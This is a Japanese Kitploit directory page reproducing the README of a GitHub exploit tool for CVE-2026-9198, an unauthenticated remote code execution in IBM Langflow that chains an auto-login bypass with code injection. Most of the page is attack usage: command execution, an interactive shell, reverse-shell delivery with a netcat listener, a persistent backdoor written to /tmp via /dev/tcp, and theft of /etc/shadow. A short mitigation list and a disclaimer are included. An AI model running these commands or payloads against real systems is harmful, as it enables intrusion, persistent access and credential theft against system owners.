Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-9198 — IBM Langflow 自動ログインバイパスを介した未認証RCE | Kitploit
ツール/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
ペイロード生成エクスプロイトウェブアプリケーション悪用コマンド&コントロール認証レッドチーミングリモートアクセスツール
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow 自動ログインバイパスを介した未認証RCE

リポジトリを見る
111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
Langflow ロゴ

🚨 CVE-2026-9198

自動ログインバイパスによる IBM Langflow OSS 未認証 RCE

License: MIT Python 3.6+ Security


📋 概要

CVE-2026-9198 は、IBM Langflow OSS における重大な未認証リモートコード実行 (RCE) 脆弱性です。このエクスプロイトは、以下の2つの脆弱性を連鎖させます:

  • CVE-2026-9103: 未認証の呼び出し元にスーパーユーザー JWT トークンを付与する自動ログインバイパス
  • CVE-2026-8481: 任意の Python 実行を可能にする /api/v1/validate/code エンドポイントにおけるコードインジェクション

⚠️ 警告: このツールは、許可されたセキュリティテストおよび教育目的のみに使用してください。無断使用は違法です。


🚀 機能

  • 🔓 自動ログインバイパス - スーパーユーザー JWT トークンを自動取得
  • 💻 対話型擬似シェル - ユーザー名と現在のディレクトリを表示する動的プロンプト
  • 📝 単一コマンド実行 - 任意のシステムコマンドを実行
  • 🔄 リバースシェル - ワンライナーのリバースシェルペイロードを配信
  • 🎨 カラフルな出力 - ANSI カラーによる視覚的なフィードバック
  • ⚡ 高速かつ信頼性が高い - 堅牢なエラーハンドリングを内蔵

📦 インストール

前提条件

  • Python 3.6 以上
  • pip パッケージマネージャー

ステップ1: リポジトリのクローン

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

ステップ2: 依存関係のインストール

root@kitploit:~
pip install termcolor

または、すべての依存関係を一度にインストールします:

root@kitploit:~
pip install -r requirements.txt

ステップ3: インストールの確認

root@kitploit:~
python CVE-2026-9198.py --help

すべての利用可能なオプションを含むヘルプメニューが表示されるはずです。


🎯 使用方法

基本コマンド実行

ターゲット上で単一のコマンドを実行します:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

例:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

対話型擬似シェル

動的プロンプトを備えた対話型シェルを起動します:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

機能:

  • user@host と現在のディレクトリを表示する動的プロンプト
  • プロンプトを自動更新する cd コマンドのサポート
  • コマンド履歴 (ターミナルに依存)
  • クリーンな出力フォーマット

セッション例:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

リバースシェル

リスナーにリバースシェルペイロードを送信します:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

例:

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

カスタムポート

Langflow がデフォルト以外のポートで実行されている場合:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

例:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

事前取得済みトークンの使用

自動ログインプロセスをスキップして、既存のトークンを使用します:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

タイムアウト設定

低速ネットワーク向けに HTTP タイムアウトを調整します:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 コマンドライン引数


🔧 使用例

1. 基本情報の収集

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. ファイルシステムの探索

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. 永続的バックドア

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. ネットワークスキャン (ターゲットから)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. 機密ファイルの窃取

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ 対策

この脆弱性から保護するには:

  1. 本番環境では自動ログインを無効化する
  2. IBM がリリースした Langflow 向けパッチを適用する
  3. Langflow の管理インターフェースへのネットワークアクセスを制限する
  4. /api/v1/auto_login および /api/v1/validate/code への異常な API リクエストを監視する
  5. WAF ルールを使用して不審なペイロードパターンをブロックする

⚠️ 免責事項

このツールは、教育および許可されたセキュリティテストの目的のみで提供されます。作者は、本ソフトウェアの誤用または損害について一切の責任を負いません。利用者は、適用される法令を遵守する責任を負います。


📄 ライセンス

このプロジェクトは MIT ライセンスの下で提供されています。詳細については LICENSE ファイルを参照してください。


👨‍💻 作成者

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • セキュリティリサーチャー & ペネトレーションテスター

📚 参考情報

  • CVE-2026-9198 の詳細
  • CVE-2026-9103 - 自動ログインバイパス
  • CVE-2026-8481 - コードインジェクション
  • Langflow 公式サイト

🤝 コントリビューション

コントリビューションを歓迎します! お気軽にプルリクエストを送信してください。

  1. リポジトリをフォークする
  2. 機能ブランチを作成する (git checkout -b feature/AmazingFeature)
  3. 変更をコミットする (git commit -m 'Add some AmazingFeature')
  4. ブランチにプッシュする (git push origin feature/AmazingFeature)
  5. プルリクエストを開く

⭐ スター履歴

このツールが役に立つと思われた場合は、GitHub で ⭐ を付けていただけると幸いです!


0xgh057r3c0n が ❤️ を込めて作成
ツールをダウンロード
引数説明必須デフォルト
-t, --targetターゲットのホスト/IP または完全な URL✅ はい-
-p, --portLangflow のポート❌ いいえ7860
-c, --cmd単一のコマンドを実行❌ いいえ"id"
--shell対話型擬似シェルモード❌ いいえFalse
--lhostリバースシェルリスナーの IP❌ いいえ-
--lportリバースシェルリスナーのポート❌ いいえ4444
-k, --token指定されたベアラートークンを使用❌ いいえ-
--timeoutHTTP タイムアウト (秒)❌ いいえ20
--no-bannerバナーを非表示❌ いいえFalse